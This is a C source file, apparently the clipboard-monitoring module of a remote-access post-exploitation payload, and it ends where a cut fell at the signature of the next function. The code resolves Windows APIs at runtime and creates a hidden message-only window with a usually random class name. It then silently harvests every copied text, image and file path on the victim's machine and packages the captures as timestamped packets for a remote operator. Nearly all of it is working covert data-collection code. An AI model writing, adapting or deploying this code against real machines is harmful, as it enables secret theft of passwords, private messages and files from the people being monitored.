/*! * @file clipboard.c * @brief Definitions for clipboard interaction functionality. */ #include "extapi.h" #include "../../common/thread.h" #include "clipboard.h" #include "clipboard_image.h" /*! @brief The different types of captures that the monitor supports. */ typedef enum _ClipboadrCaptureType { CapText, ///! Capture is just plain text. CapFiles, ///! Capture is a list of one or more files. CapImage ///! Capture is an image. } ClipboardCaptureType; /*! @brief Container for image capture data. */ typedef struct _ClipboardImage { DWORD dwWidth; ///! Width of the image. DWORD dwHeight; ///! Height of the image. DWORD dwImageSize; ///! Size of the image, in bytes. LPBYTE lpImageContent; ///! Pointer to the image content. } ClipboardImage; /*! @brief Container for file capture data. */ typedef struct _ClipboardFile { LPSTR lpPath; ///! Full path to the file. QWORD qwSize; ///! Size of the file in bytes. struct _ClipboardFile* pNext; ///! Pointer to the next file in the copied batch. } ClipboardFile; /*! @brief Container for file capture data. */ typedef struct _ClipboardCapture { ClipboardCaptureType captureType; ///! Indicates the type of capture for this entry. union { LPSTR lpText; ///! Set when the captureType is CapText. ClipboardImage* lpImage; ///! Set when the captureType is CapImage. ClipboardFile* lpFiles; ///! Set when the captureType is CapFile. }; SYSTEMTIME stCaptureTime; ///! The time that the clipboard entry was captured. DWORD dwSize; ///! Size of the clipboard entry. struct _ClipboardCapture* pNext; ///! Pointer to the next captured clipboard entry. } ClipboardCapture; /*! @brief Container for the list of clipboard capture entries. */ typedef struct _ClipboardCaptureList { ClipboardCapture* pHead; ///! Pointer to the head of the capture list. ClipboardCapture* pTail; ///! Pointer to the tail of the capture list. LOCK* pClipboardCaptureLock; ///! Lock to handle concurrent access to the clipboard capture list. DWORD dwClipboardDataSize; ///! Indication of how much data we have in memory. } ClipboardCaptureList; /*! @brief Container for clipboard monitor state. */ typedef struct _ClipboardState { char cbWindowClass[256]; ///! Name to use for the window class when registering the message-only window (usually random). HWND hClipboardWindow; ///! Handle to the clipboard monitor window. HWND hNextViewer; ///! Handle to the next window in the clipboard chain. ClipboardCaptureList captureList; ///! List of clipboard captures. BOOL bRunning; ///! Indicates if the thread is running or not. EVENT* hResponseEvent; ///! Handle to the event that signals when the thread has actioned the caller's request. EVENT* hPauseEvent; ///! Signalled when the caller wants the thread to pause. EVENT* hResumeEvent; ///! Signalled when the caller wants the thread to resume. BOOL bCaptureImageData; ///! Capture image data that's found on the clipboard. THREAD* hThread; ///! Reference to the clipboard monitor thread. } ClipboardState; /*! @brief Pointer to the state for the monitor thread. */ static ClipboardState* gClipboardState = NULL; /*! @brief Flag indicating initialision status of the clipboard state. */ static BOOL gClipboardInitialised = FALSE; /*! @brief GlobalAlloc function pointer type. */ typedef HGLOBAL(WINAPI * PGLOBALALLOC)(UINT uFlags, SIZE_T dwBytes); /*! @brief GlobalFree function pointer type. */ typedef HGLOBAL(WINAPI * PGLOBALFREE)(HGLOBAL hMem); /*! @brief GlobalLock function pointer type. */ typedef LPVOID(WINAPI * PGLOBALLOCK)(HGLOBAL hMem); /*! @brief GlobalUnlock function pointer type. */ typedef LPVOID(WINAPI * PGLOBALUNLOCK)(HGLOBAL hMem); /*! @brief OpenClipboard function pointer type. */ typedef BOOL(WINAPI * POPENCLIPBOARD)(HWND hWndNewOwner); /*! @brief CloseClipboard function pointer type. */ typedef BOOL(WINAPI * PCLOSECLIPBOARD)(); /*! @brief SetClipboardData function pointer type. */ typedef HANDLE(WINAPI * PSETCLIPBOARDDATA)(UINT uFormat, HANDLE hMem); /*! @brief SetClipboardData function pointer type. */ typedef HANDLE(WINAPI * PGETCLIPBOARDDATA)(UINT uFormat); /*! @brief EnumClipboardFormats function pointer type. */ typedef UINT(WINAPI * PENUMCLIPBOARDFORMATS)(UINT uFormat); /*! @brief EmptyClipboard function pointer type. */ typedef BOOL(WINAPI * PEMPTYCLIPBOARD)(); /*! @brief DragQueryFileA function pointer type. */ typedef BOOL(WINAPI * PDRAGQUERYFILEA)(HDROP hDrop, UINT iFile, LPSTR lpszFile, UINT cch); /*! @brief CreateFileA function pointer type. */ typedef HANDLE(WINAPI * PCREATEFILEA)(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); /*! @brief CloseHandle function pointer type. */ typedef BOOL(WINAPI * PCLOSEHANDLE)(HANDLE hObject); /*! @brief GetFileSizeEx function pointer type. */ typedef BOOL(WINAPI * PGETFILESIZEEX)(HANDLE hFile, PLARGE_INTEGER lpFileSize); static PCLOSECLIPBOARD pCloseClipboard = NULL; static PCLOSEHANDLE pCloseHandle = NULL; static PCREATEFILEA pCreateFileA = NULL; static PDRAGQUERYFILEA pDragQueryFileA = NULL; static PEMPTYCLIPBOARD pEmptyClipboard = NULL; static PENUMCLIPBOARDFORMATS pEnumClipboardFormats = NULL; static PGETCLIPBOARDDATA pGetClipboardData = NULL; static PGETFILESIZEEX pGetFileSizeEx = NULL; static PGLOBALALLOC pGlobalAlloc = NULL; static PGLOBALFREE pGlobalFree = NULL; static PGLOBALLOCK pGlobalLock = NULL; static PGLOBALUNLOCK pGlobalUnlock = NULL; static POPENCLIPBOARD pOpenClipboard = NULL; static PSETCLIPBOARDDATA pSetClipboardData = NULL; /*! * @brief Initialises the clipboard functionality for use. * @remark This function has the job of finding all the clipboard related function pointers. * @returns An indication of success or failure. */ DWORD initialise_clipboard() { DWORD dwResult; HMODULE hKernel32 = NULL; HMODULE hUser32 = NULL; HMODULE hShell32 = NULL; do { dprintf("[EXTAPI CLIPBOARD] Loading user32.dll"); if ((hUser32 = LoadLibraryA("user32.dll")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to load user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Loading kernel32.dll"); if ((hKernel32 = LoadLibraryA("kernel32.dll")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to load kernel32.dll"); } if ((hShell32 = LoadLibraryA("shell32.dll")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to load shell32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GlobalLock"); if ((pGlobalLock = (PGLOBALLOCK)GetProcAddress(hKernel32, "GlobalLock")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GlobalLock in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GlobalUnlock"); if ((pGlobalUnlock = (PGLOBALUNLOCK)GetProcAddress(hKernel32, "GlobalUnlock")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GlobalUnlock in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for OpenClipboard"); if ((pOpenClipboard = (POPENCLIPBOARD)GetProcAddress(hUser32, "OpenClipboard")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate OpenClipboard in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for CloseClipboard"); if ((pCloseClipboard = (PCLOSECLIPBOARD)GetProcAddress(hUser32, "CloseClipboard")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate CloseClipboard in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GetClipboardData"); if ((pGetClipboardData = (PGETCLIPBOARDDATA)GetProcAddress(hUser32, "GetClipboardData")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GetClipboardData in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for EnumClipboardFormats"); if ((pEnumClipboardFormats = (PENUMCLIPBOARDFORMATS)GetProcAddress(hUser32, "EnumClipboardFormats")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate EnumClipboardFormats in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for CreateFileA"); if ((pCreateFileA = (PCREATEFILEA)GetProcAddress(hKernel32, "CreateFileA")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate CreateFileA in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for CloseHandle"); if ((pCloseHandle = (PCLOSEHANDLE)GetProcAddress(hKernel32, "CloseHandle")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate CloseHandle in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GetFileSizeEx"); if ((pGetFileSizeEx = (PGETFILESIZEEX)GetProcAddress(hKernel32, "GetFileSizeEx")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GetFileSizeEx in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for DragQueryFileA"); if ((pDragQueryFileA = (PDRAGQUERYFILEA)GetProcAddress(hShell32, "DragQueryFileA")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate CloseClipboard in shell32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GlobalAlloc"); if ((pGlobalAlloc = (PGLOBALALLOC)GetProcAddress(hKernel32, "GlobalAlloc")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GlobalAlloc in kernel32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for EmptyClipboard"); if ((pEmptyClipboard = (PEMPTYCLIPBOARD)GetProcAddress(hUser32, "EmptyClipboard")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate EmptyClipboard in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for SetClipboardData"); if ((pSetClipboardData = (PSETCLIPBOARDDATA)GetProcAddress(hUser32, "SetClipboardData")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate SetClipboardData in user32.dll"); } dprintf("[EXTAPI CLIPBOARD] Searching for GlobalFree"); if ((pGlobalFree = (PGLOBALFREE)GetProcAddress(hKernel32, "GlobalFree")) == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Unable to locate GlobalFree in kernel32.dll"); } dwResult = ERROR_SUCCESS; gClipboardInitialised = TRUE; } while (0); return dwResult; } /*! * @brief Clean up the list of captures in the given list of captures. * @param pCaptureList Pointer to the list of captures to clean up. * @param bRemoveLock If \c TRUE, remove the list capture lock. * @remark This iterates through the list and correctly frees up all the * resources used by the list. */ VOID destroy_clipboard_monitor_capture(ClipboardCaptureList* pCaptureList, BOOL bRemoveLock) { ClipboardFile* pFile, *pNextFile; while (pCaptureList->pHead) { pCaptureList->pTail = pCaptureList->pHead->pNext; switch (pCaptureList->pHead->captureType) { case CapText: free(pCaptureList->pHead->lpText); break; case CapImage: free(pCaptureList->pHead->lpImage->lpImageContent); free(pCaptureList->pHead->lpImage); break; case CapFiles: pFile = pCaptureList->pHead->lpFiles; while (pFile) { pNextFile = pFile->pNext; free(pFile->lpPath); free(pFile); pFile = pNextFile; } break; } free(pCaptureList->pHead); pCaptureList->pHead = pCaptureList->pTail; } if (bRemoveLock && pCaptureList->pClipboardCaptureLock) { lock_destroy(pCaptureList->pClipboardCaptureLock); pCaptureList->pClipboardCaptureLock = NULL; } pCaptureList->pHead = pCaptureList->pTail = NULL; pCaptureList->dwClipboardDataSize = 0; } /*! * @brief Convert a timestamp value to a string in the form YYYY-MM-DD HH:mm:ss.ffff * @param pTime Pointer to the \c SYSTEMTIME structure to convert. * @param buffer Pointer to the buffer that will receive the time value. */ VOID timestamp_to_string(SYSTEMTIME* pTime, char buffer[40]) { dprintf("[EXTAPI CLIPBOARD] parsing timestamp %p", pTime); sprintf_s(buffer, 40, "%04u-%02u-%02u %02u:%02u:%02u.%04u", pTime->wYear, pTime->wMonth, pTime->wDay, pTime->wHour, pTime->wMinute, pTime->wSecond, pTime->wMilliseconds); dprintf("[EXTAPI CLIPBOARD] timestamp parsed"); } /*! * @brief Dump all the captured clipboard data to the given packet. * @param pResponse pointer to the response \c Packet that the data needs to be written to. * @param pCapture Pointer to the clipboard capture item to dump. * @param bCaptureImageData Indication of whether to include image data in the capture. */ VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL bCaptureImageData) { ClipboardFile* pFile; Packet* group = packet_create_group(); TlvType groupType; Packet* file = NULL; char timestamp[40]; dprintf("[EXTAPI CLIPBOARD] Dumping clipboard capture"); memset(timestamp, 0, sizeof(timestamp)); timestamp_to_string(&pCapture->stCaptureTime, timestamp); packet_add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP, timestamp); dprintf("[EXTAPI CLIPBOARD] Timestamp added: %s", timestamp); switch (pCapture->captureType) { case CapText: dprintf("[EXTAPI CLIPBOARD] Dumping text %s", pCapture->lpText); packet_add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, (PUCHAR)(pCapture->lpText ? pCapture->lpText : "(null - clipboard was cleared)")); groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT; break; case CapImage: dprintf("[EXTAPI CLIPBOARD] Dumping image %ux%x", pCapture->lpImage->dwWidth, pCapture->lpImage->dwHeight); packet_add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX, pCapture->lpImage->dwWidth); packet_add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY, pCapture->lpImage->dwHeight); packet_add_tlv_raw(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA, pCapture->lpImage->lpImageContent, pCapture->lpImage->dwImageSize); groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG; break; case CapFiles: pFile = pCapture->lpFiles; while (pFile) { dprintf("[EXTAPI CLIPBOARD] Dumping file %p", pFile); file = packet_create_group(); dprintf("[EXTAPI CLIPBOARD] Adding path %s", pFile->lpPath); packet_add_tlv_string(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME, pFile->lpPath); dprintf("[EXTAPI CLIPBOARD] Adding size %llu", pFile->qwSize); packet_add_tlv_qword(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE, pFile->qwSize); dprintf("[EXTAPI CLIPBOARD] Adding group"); packet_add_group(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, file); pFile = pFile->pNext; dprintf("[EXTAPI CLIPBOARD] Moving to next"); } groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES; break; } packet_add_group(pResponse, groupType, group); } /*! * @brief Dump the given clipboard capture list to the specified response. * @param pResponse Pointer to the response \c Packet to write the data to. * @param pCaptureList Pointer to the list of captures to iterate over and write to the packet. * @param bCaptureImageData Indication of whether to include image data in the dump. * @param bPurge Indication of whether to purge the contents of the list once dumped. * @remark if \c bPurge is \c TRUE the list of capture data is cleared and freed after dumping. */ VOID dump_clipboard_capture_list(Packet* pResponse, ClipboardCaptureList* pCaptureList, BOOL bCaptureImageData, BOOL bPurge) { ClipboardCapture* pCapture = NULL; lock_acquire(pCaptureList->pClipboardCaptureLock); pCapture = pCaptureList->pHead; while (pCapture) { dump_clipboard_capture(pResponse, pCapture, bCaptureImageData); pCapture = pCapture->pNext; } if (bPurge) { destroy_clipboard_monitor_capture(pCaptureList, FALSE); } lock_release(pCaptureList->pClipboardCaptureLock); } /*! * @brief Determine if a capture is a duplicate based on the previously captured element. * @param pNewCapture Pointer to the new capture value. * @param pList Pointer to the capture list of existing captures. * @retval TRUE if the contents of \c pNewCapture are the same as the last element in \c pList. * @retval FALSE if the contents of \c pNewCapture are not the same as the last element in \c pList. * @remark This is quite "dumb" and will only check agains the previous value in the list. The goal * is to reduce fat-fingering copies and reduce the size of the data coming back. If people * copy the same data multiple times at different times then we want to capture that in the * timeline. Comparison is just a byte-for-byte compare. */ BOOL is_duplicate(ClipboardCapture* pNewCapture, ClipboardCaptureList* pList) { ClipboardFile* pTailFiles = NULL; ClipboardFile* pNewFiles = NULL; BOOL bResult = FALSE; lock_acquire(pList->pClipboardCaptureLock); do { if (pList->pTail == NULL) { break; } if (pList->pTail->captureType != pNewCapture->captureType) { break; } switch (pNewCapture->captureType) { case CapText: { if (lstrcmpA(pNewCapture->lpText, pList->pTail->lpText) == 0) { bResult = TRUE; } break; } case CapFiles: { pTailFiles = pList->pTail->lpFiles; pNewFiles = pNewCapture->lpFiles; while (pTailFiles != NULL && pNewFiles != NULL) { if (pTailFiles->qwSize != pNewFiles->qwSize || lstrcmpA(pTailFiles->lpPath, pNewFiles->lpPath) != 0) { break; } pTailFiles = pTailFiles->pNext; pNewFiles = pNewFiles->pNext; } if (pTailFiles == NULL && pNewFiles == NULL) { // we got to the end without an early-out, and the lists are // the same size, so, they're the same! bResult = TRUE; } break; } case CapImage: { if (pNewCapture->dwSize == pList->pTail->dwSize && pNewCapture->lpImage->dwHeight == pList->pTail->lpImage->dwHeight && pNewCapture->lpImage->dwWidth == pList->pTail->lpImage->dwWidth) { // looking quite similar. if no content given we'll assume different because // there's little to no damage in recording an extra copy and paste of an image // without storing the data. So only when they're both non-null will we continue. if (pNewCapture->lpImage->lpImageContent != NULL && pList->pTail->lpImage->lpImageContent != NULL) { if (memcmp(pNewCapture->lpImage->lpImageContent, pList->pTail->lpImage->lpImageContent, pNewCapture->lpImage->dwImageSize) == 0) { bResult = TRUE; } } } break; } } } while (0); lock_release(pList->pClipboardCaptureLock); return bResult; } /*! * @brief Add a new capture to the list of clipboard captures. * @param pNewCapture The newly captured clipboard data to add. * @param pList Pointer to the list of captures to add the item to. * @returns Indcation of whether the value was added. * @retval FALSE Indicates that the value was a duplicate, and not added again. */ BOOL add_clipboard_capture(ClipboardCapture* pNewCapture, ClipboardCaptureList* pList) { if (is_duplicate(pNewCapture, pList)) { return FALSE; } lock_acquire(pList->pClipboardCaptureLock); pNewCapture->pNext = NULL; if (pList->pTail == NULL) { pList->pHead = pList->pTail = pNewCapture; } else { pList->pTail->pNext = pNewCapture; pList->pTail = pList->pTail->pNext = pNewCapture; } pList->dwClipboardDataSize += pNewCapture->dwSize; lock_release(pList->pClipboardCaptureLock); return TRUE; } /*! * @brief Capture data that is currently on the clipboard. * @param bCaptureImageData Indication of whether to include image data in the capture. * @param ppCapture Pointer that will receive a pointer to the newly captured data. * @returns Indication of success or failure. * @remark If \c ppCapture contains a value when the function returns, the caller needs * to call \c free() on that value later when it finished. */ DWORD capture_clipboard(BOOL bCaptureImageData, ClipboardCapture** ppCapture) { DWORD dwResult; DWORD dwCount; HANDLE hSourceFile = NULL; PCHAR lpClipString = NULL; HGLOBAL hClipboardData = NULL; HDROP hFileDrop = NULL; UINT uFormat = 0; UINT uFileIndex = 0; UINT uFileCount = 0; CHAR lpFileName[MAX_PATH]; LARGE_INTEGER largeInt = { 0 }; LPBITMAPINFO lpBI = NULL; PUCHAR lpDIB = NULL; ConvertedImage image; ClipboardFile* pFile = NULL; ClipboardCapture* pCapture = (ClipboardCapture*)malloc(sizeof(ClipboardCapture)); memset(pCapture, 0, sizeof(ClipboardCapture)); pCapture->pNext = NULL; dprintf("[EXTAPI CLIPBOARD] Getting timestamp"); GetSystemTime(&pCapture->stCaptureTime); do { // Try to get a lock on the clipboard if (!pOpenClipboard(NULL)) { dwResult = GetLastError(); BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to open the clipboard", dwResult); } dprintf("[EXTAPI CLIPBOARD] Clipboard locked, attempting to get data..."); while (uFormat = pEnumClipboardFormats(uFormat)) { if (uFormat == CF_TEXT) { // there's raw text on the clipboard if ((hClipboardData = pGetClipboardData(CF_TEXT)) != NULL && (lpClipString = (PCHAR)pGlobalLock(hClipboardData)) != NULL) { dprintf("[EXTAPI CLIPBOARD] Clipboard text captured: %s", lpClipString); pCapture->captureType = CapText; dwCount = lstrlenA(lpClipString) + 1; pCapture->lpText = (char*)malloc(dwCount); memset(pCapture->lpText, 0, dwCount); strncpy_s(pCapture->lpText, dwCount, lpClipString, dwCount - 1); pCapture->dwSize = dwCount; pGlobalUnlock(hClipboardData); } } else if (uFormat == CF_DIB) { dprintf("[EXTAPI CLIPBOARD] Grabbing the clipboard bitmap data"); // an image of some kind is on the clipboard if ((hClipboardData = pGetClipboardData(CF_DIB)) != NULL && (lpBI = (LPBITMAPINFO)pGlobalLock(hClipboardData)) != NULL) { dprintf("[EXTAPI CLIPBOARD] CF_DIB grabbed, extracting dimensions."); // grab the bitmap image size pCapture->captureType = CapImage; pCapture->lpImage = (ClipboardImage*)malloc(sizeof(ClipboardImage)); memset(pCapture->lpImage, 0, sizeof(ClipboardImage)); pCapture->lpImage->dwWidth = lpBI->bmiHeader.biWidth; pCapture->lpImage->dwHeight = lpBI->bmiHeader.biHeight; // throw together a basic guess for this, it doesn't have to be exact. pCapture->dwSize = lpBI->bmiHeader.biWidth * lpBI->bmiHeader.biHeight * 4; // only download the image if they want it dprintf("[EXTAPI CLIPBOARD] Image is %dx%d and %s be downloaded", lpBI->bmiHeader.biWidth, lpBI->bmiHeader.biHeight, bCaptureImageData ? "WILL" : "will NOT"); if (bCaptureImageData) { lpDIB = ((PUCHAR)lpBI) + get_bitmapinfo_size(lpBI, TRUE); // TODO: add the ability to encode with multiple encoders and return the smallest image. if (convert_to_jpg(lpBI, lpDIB, 75, &image) == ERROR_SUCCESS) { dprintf("[EXTAPI CLIPBOARD] Clipboard bitmap captured to image: %p, Size: %u bytes", image.pImageBuffer, image.dwImageBufferSize); pCapture->lpImage->lpImageContent = image.pImageBuffer; pCapture->lpImage->dwImageSize = image.dwImageBufferSize; pCapture->dwSize = image.dwImageBufferSize; // Just leaving this in for debugging purposes later on //hSourceFile = CreateFileA("C:\\temp\\foo.jpg", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); //WriteFile(hSourceFile, image.pImageBuffer, image.dwImageBufferSize, &largeInt.LowPart, NULL); //CloseHandle(hSourceFile); } else { dwResult = GetLastError(); dprintf("[EXTAPI CLIPBOARD] Failed to convert clipboard image to JPG"); } } pGlobalUnlock(hClipboardData); } else { dwResult = GetLastError(); dprintf("[EXTAPI CLIPBOARD] Failed to get access to the CF_DIB information"); } } else if (uFormat == CF_HDROP) { // there's one or more files on the clipboard dprintf("[EXTAPI CLIPBOARD] Files have been located on the clipboard"); dprintf("[EXTAPI CLIPBOARD] Grabbing the clipboard file drop data"); if ((hClipboardData = pGetClipboardData(CF_HDROP)) != NULL && (hFileDrop = (HDROP)pGlobalLock(hClipboardData)) != NULL) { uFileCount = pDragQueryFileA(hFileDrop, (UINT)-1, NULL, 0); dprintf("[EXTAPI CLIPBOARD] Parsing %u file(s) on the clipboard.", uFileCount); pCapture->captureType = CapFiles; pFile = pCapture->lpFiles; for (uFileIndex = 0; uFileIndex < uFileCount; ++uFileIndex) { if (pFile == NULL) { dprintf("[EXTAPI CLIPBOARD] First file"); pCapture->lpFiles = pFile = (ClipboardFile*)malloc(sizeof(ClipboardFile)); } else { dprintf("[EXTAPI CLIPBOARD] Extra file"); pFile->pNext = (ClipboardFile*)malloc(sizeof(ClipboardFile)); pFile = pFile->pNext; } memset(pFile, 0, sizeof(ClipboardFile)); dprintf("[EXTAPI CLIPBOARD] Attempting to get file data"); if (pDragQueryFileA(hFileDrop, uFileIndex, lpFileName, sizeof(lpFileName))) { dprintf("[EXTAPI CLIPBOARD] Clipboard file entry: %s", lpFileName); dwCount = lstrlenA(lpFileName) + 1; pFile->lpPath = (char*)malloc(dwCount); memset(pFile->lpPath, 0, dwCount); strncpy_s(pFile->lpPath, dwCount, lpFileName, dwCount - 1); pCapture->dwSize += dwCount; memset(&largeInt, 0, sizeof(largeInt)); if ((hSourceFile = pCreateFileA(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != NULL) { if (pGetFileSizeEx(hSourceFile, &largeInt)) { pFile->qwSize = largeInt.QuadPart; } pCloseHandle(hSourceFile); } } } pGlobalUnlock(hClipboardData); } } } dwResult = GetLastError(); dprintf("[EXTAPI CLIPBOARD] Finished with result %u (%x)", dwResult, dwResult); pCloseClipboard(); } while (0); if (dwResult != ERROR_SUCCESS) { free(pCapture); pCapture = NULL; } *ppCapture = pCapture; return dwResult; } /*! * @brief Message proc function for the hidden clipboard monitor window. * @param hWnd Handle to the window receiving the message. * @param uMsg Message that is being received. * @param wParam First parameter associated with the message. * @param lParam Second parameter associated with the message. * @returns Message-specific result. * @remark This window proc captures the clipboard change events. */ LRESULT WINAPI clipboard_monitor_window_proc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { DWORD dwResult; ClipboardState* pState = NULL; ClipboardCapture* pNewCapture = NULL; switch (uMsg) { case WM_NCCREATE: return TRUE; case WM_CREATE: dprintf("[EXTAPI CLIPBOARD] received WM_CREATE %x (lParam = %p wParam = %p)", hWnd, lParam, wParam); pState = (ClipboardState*)((CREATESTRUCTA*)lParam)->lpCreateParams; SetWindowLongPtrA(hWnd, GWLP_USERDATA, (LONG_PTR)pState); pState->hNextViewer = SetClipboardViewer(hWnd); dprintf("[EXTAPI CLIPBOARD] SetClipboardViewer called, next viewer is %x", pState->hNextViewer); if (!pState->hNextViewer) { dprintf("[EXTAPI CLIPBOARD] SetClipboardViewer error %u", GetLastError()); } return 0; case WM_CHANGECBCHAIN: dprintf("[EXTAPI CLIPBOARD] received WM_CHANGECBCHAIN %x", hWnd); pState = (ClipboardState*)GetWindowLongPtrA(hWnd, GWLP_USERDATA); if ((HWND)wParam == pState->hNextViewer) { pState->hNextViewer = (HWND)lParam; dprintf("[EXTAPI CLIPBOARD] Next viewer is now %x", pState->hNextViewer); } else if (pState->hNextViewer) { SendMessageA(pState->hNextViewer, uMsg, wParam, lParam); } return 0; case WM_DRAWCLIPBOARD: dprintf("[EXTAPI CLIPBOARD] received WM_DRAWCLIPBOARD %x", hWnd); pState = (ClipboardState*)GetWindowLongPtrA(hWnd, GWLP_USERDATA); if (pState->bRunning) { dprintf("[EXTAPI CLIPBOARD] thread is running, harvesting clipboard %x", hWnd); dwResult = capture_clipboard(pState->bCaptureImageData, &pNewCapture); if (dwResult == ERROR_SUCCESS && pNewCapture != NULL) { if (add_clipboard_capture(pNewCapture, &pState->captureList)) { dprintf("[EXTAPI CLIPBOARD] Capture added %x", hWnd); } else { free(pNewCapture); dprintf("[EXTAPI CLIPBOARD] Ignoring duplicate capture", hWnd); } } else { dprintf("[EXTAPI CLIPBOARD] Failed to harvest from clipboard %x: %u (%x)", hWnd, dwResult, dwResult); } } else { dprintf("[EXTAPI CLIPBOARD] thread is no running, ignoring clipboard change %x", hWnd); } if (pState->hNextViewer) { dprintf("[EXTAPI CLIPBOARD] Passing on to %x", pState->hNextViewer); SendMessageA(pState->hNextViewer, uMsg, wParam, lParam); } return 0; case WM_DESTROY: dprintf("[EXTAPI CLIPBOARD] received WM_DESTROY %x", hWnd); pState = (ClipboardState*)GetWindowLongPtrA(hWnd, GWLP_USERDATA); ChangeClipboardChain(hWnd, pState->hNextViewer); return 0; default: dprintf("[EXTAPI CLIPBOARD] received %x for window %x", uMsg); return DefWindowProcA(hWnd, uMsg, wParam, lParam); } } /*! * @brief Create a hidden window that will capture clipboard change events. * @param pState Pointer to the state entity for the current clipboard thread. * @returns Indication of success or failure. * @remark This function also registers a random window class. */ DWORD create_clipboard_monitor_window(ClipboardState* pState) { DWORD dwResult; BOOL bRegistered = FALSE; WNDCLASSEXA wndClass = { 0 }; ZeroMemory(&wndClass, sizeof(wndClass)); wndClass.cbSize = sizeof(WNDCLASSEXA); wndClass.lpfnWndProc = (WNDPROC)clipboard_monitor_window_proc; wndClass.hInstance = GetModuleHandleA(NULL); wndClass.lpszClassName = pState->cbWindowClass; dprintf("[EXTAPI CLIPBOARD] Setting up the monitor window. Class = %s from %p -> %s", wndClass.lpszClassName, pState, pState->cbWindowClass); do { if (!RegisterClassExA(&wndClass)) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Failed to register window class."); } dprintf("[EXTAPI CLIPBOARD] Window registered"); bRegistered = TRUE; pState->hClipboardWindow = CreateWindowExA(0, pState->cbWindowClass, pState->cbWindowClass, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, wndClass.hInstance, pState); if (pState->hClipboardWindow == NULL) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Failed to create message only window instance"); } dprintf("[EXTAPI CLIPBOARD] Window created"); dwResult = ERROR_SUCCESS; } while (0); if (pState->hClipboardWindow == NULL && bRegistered) { dprintf("[EXTAPI CLIPBOARD] Unregistering window class due to failure"); UnregisterClassA(pState->cbWindowClass, wndClass.hInstance); } return dwResult; } /*! * @brief Destroy the hidden clipboard monitor window. * @param pState Pointer to the state entity for the current clipboard thread which * contains the window handle. * @returns Indication of success or failure. * @remark This function also unregisters the random window class. */ DWORD destroy_clipboard_monitor_window(ClipboardState* pState) { DWORD dwResult; do { dprintf("[EXTAPI CLIPBOARD] Destroying clipboard monitor window: %p", pState); if (!DestroyWindow(pState->hClipboardWindow)) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Failed to destroy the clipboard window"); } if (!UnregisterClassA(pState->cbWindowClass, GetModuleHandleA(NULL))) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Failed to remove the clipboard window class"); } dwResult = ERROR_SUCCESS; } while (0); return dwResult; } /*! * @brief Handle the request to get the data from the clipboard. * @details This function currently only supports the following clipboard data formats: * - CF_TEXT - raw text data. * - CF_DIB - bitmap/image information. * - CF_HDROP - file selection. * * Over time more formats will be supported. * @param remote Pointer to the remote endpoint. * @param packet Pointer to the request packet. * @return Indication of success or failure. * @todo Add support for more data formats. */ DWORD request_clipboard_get_data(Remote *remote, Packet *packet) 